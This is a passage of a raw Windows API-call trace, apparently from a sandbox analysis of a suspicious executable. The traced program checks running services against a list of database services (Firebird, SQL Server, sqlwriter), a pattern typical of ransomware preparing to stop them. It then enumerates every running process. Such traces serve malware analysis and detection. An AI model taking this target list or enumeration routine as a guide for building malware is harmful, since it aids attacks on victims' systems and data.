(lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0208.897] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0208.897] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0208.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0208.897] lstrlenW (lpString="SecurityHealthService") returned 21 [0208.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0208.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0208.897] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0208.897] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0208.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0208.897] lstrlenW (lpString="SENS") returned 4 [0208.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0208.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0208.897] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0208.897] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0208.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0208.897] lstrlenW (lpString="ShellHWDetection") returned 16 [0208.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0208.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0208.897] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0208.897] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0208.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0208.897] lstrlenW (lpString="Spooler") returned 7 [0208.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0208.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0208.897] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0208.897] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0208.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0208.897] lstrlenW (lpString="sppsvc") returned 6 [0208.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0208.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0208.897] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0208.898] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0208.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0208.898] lstrlenW (lpString="SSDPSRV") returned 7 [0208.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0208.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0208.898] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0208.898] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0208.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3dc [0208.902] Process32FirstW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.902] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.903] lstrlenW (lpString="System") returned 6 [0208.903] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.904] lstrlenW (lpString="smss.exe") returned 8 [0208.904] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.904] lstrlenW (lpString="csrss.exe") returned 9 [0208.905] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.905] lstrlenW (lpString="wininit.exe") returned 11 [0208.905] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.906] lstrlenW (lpString="csrss.exe") returned 9 [0208.906] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.907] lstrlenW (lpString="winlogon.exe") returned 12 [0208.907] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.907] lstrlenW (lpString="services.exe") returned 12 [0208.907] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.908] lstrlenW (lpString="lsass.exe") returned 9 [0208.908] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.909] lstrlenW (lpString="svchost.exe") returned 11 [0208.909] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0208.910] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0208.910] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0208.910] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0208.910] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.911] lstrlenW (lpString="svchost.exe") returned 11 [0208.911] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.912] lstrlenW (lpString="dwm.exe") returned 7 [0208.912] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.912] lstrlenW (lpString="svchost.exe") returned 11 [0208.913] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.913] lstrlenW (lpString="svchost.exe") returned 11 [0208.913] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.914] lstrlenW (lpString="svchost.exe") returned 11 [0208.914] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.915] lstrlenW (lpString="svchost.exe") returned 11 [0208.915] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.916] lstrlenW (lpString="svchost.exe") returned 11 [0208.916] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.916] lstrlenW (lpString="svchost.exe") returned 11 [0208.916] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.917] lstrlenW (lpString="svchost.exe") returned 11 [0208.917] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.918] lstrlenW (lpString="svchost.exe") returned 11 [0208.918] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.919] lstrlenW (lpString="svchost.exe") returned 11 [0208.919] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.919] lstrlenW (lpString="spoolsv.exe") returned 11 [0208.919] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.920] lstrlenW (lpString="svchost.exe") returned 11 [0208.920] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.921] lstrlenW (lpString="svchost.exe") returned 11 [0208.921] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0208.922] lstrlenW (lpString="audiodg.exe") returned 11 [0208.922] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0208.923] lstrlenW (lpString="sihost.exe") returned 10 [0208.923] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.923] lstrlenW (lpString="svchost.exe") returned 11 [0208.923] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0208.924] lstrlenW (lpString="taskhostw.exe") returned 13 [0208.924] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0208.925] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0208.925] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0208.926] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0208.926] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.926] lstrlenW (lpString="explorer.exe") returned 12 [0208.926] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0208.927] lstrlenW (lpString="Memory Compression") returned 18 [0208.927] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0208.928] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0208.928] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0208.929] lstrlenW (lpString="SearchUI.exe") returned 12 [0208.929] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0208.947] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0208.947] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.948] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0208.948] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0208.949] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0208.949] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0208.950] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0208.950] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0208.957] lstrlenW (lpString="conhost.exe") returned 11 [0208.957] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0208.958] lstrlenW (lpString="roof competitive.exe") returned 20 [0208.958] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0208.959] lstrlenW (lpString="trustees.exe") returned 12 [0208.959] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0208.959] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0208.959] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0208.960] lstrlenW (lpString="isbn.exe") returned 8 [0208.960] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0208.961] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0208.961] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0208.962] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0208.962] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0208.963] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0208.963] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0208.963] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0208.963] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0208.964] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0208.964] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0208.965] lstrlenW (lpString="playstation iraq.exe") returned 20 [0208.965] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0208.966] lstrlenW (lpString="harbor.exe") returned 10 [0208.966] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0208.967] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0208.967] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0208.967] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0208.967] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0208.968] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0208.968] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0208.969] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0208.969] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0208.969] lstrlenW (lpString="larent.exe") returned 10 [0208.969] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0208.970] lstrlenW (lpString="stereo.exe") returned 10 [0208.970] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0208.971] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0208.971] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0208.972] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0208.972] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0208.972] lstrlenW (lpString="state.exe") returned 9 [0208.973] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0208.973] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0208.973] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, 